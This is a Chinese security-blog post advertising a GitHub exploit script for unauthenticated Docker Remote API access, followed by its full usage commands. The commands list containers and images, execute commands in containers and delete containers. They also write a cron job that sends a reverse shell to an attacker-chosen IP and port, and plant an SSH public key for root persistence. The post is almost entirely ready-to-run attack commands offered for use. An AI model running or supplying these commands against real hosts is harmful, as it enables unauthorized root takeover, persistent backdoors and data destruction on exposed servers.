Docker 未授权访问漏洞利用脚本

2018-04-0708:52:12 发表评论

Docker 未授权访问漏洞利用脚本

项目地址:https://github.com/Tycx2ry/docker_api_vul

docker 未授权访问漏洞利用脚本使用方法:


##安装类库
pip install -r requirements.txt

##查看运行的容器
python dockerRemoteApiGetRootShell.py -h 192.168.6.25 -p 2375

##查看所有的容器
python dockerRemoteApiGetRootShell.py -h 192.168.6.25 -p 2375 -a

##查看所有镜像
python dockerRemoteApiGetRootShell.py -h 192.168.6.25 -p 2375 -l

##查看端口映射
python dockerRemoteApiGetRootShell.py -h 192.168.6.25 -p 2375 -L

##写计划任务(centos,redhat等,加-u参数用于ubuntu等)
python dockerRemoteApiGetRootShell.py -h 192.168.6.25 -p 2375 -C -i 镜像名 -H 反弹ip -P 反弹端口
python dockerRemoteApiGetRootShell.py -h 192.168.6.25 -p 2375 -C -u -i 镜像名 -H 反弹ip -P 反弹端口

##写sshkey(自行修改脚本的中公钥)
python dockerRemoteApiGetRootShell.py -h 192.168.6.25 -p 2375 -C -i 镜像名 -k

##在容器中执行命令
python dockerRemoteApiGetRootShell.py -h 192.168.6.25 -p 2375 -e "id" -I 容器id

##删除容器
python dockerRemoteApiGetRootShell.py -h 192.168.6.25 -p 2375 -c -I 容器id

##修改client api版本
python dockerRemoteApiGetRootShell.py -h 192.168.6.25 -p 2375 -v 1.22

##查看服务端api版本
python dockerRemoteApiGetRootShell.py -h 192.168.6.25 -p 2375 -V

 

CE安全网
CE安全网广告位招租

发表评论

您必须登录才能发表评论!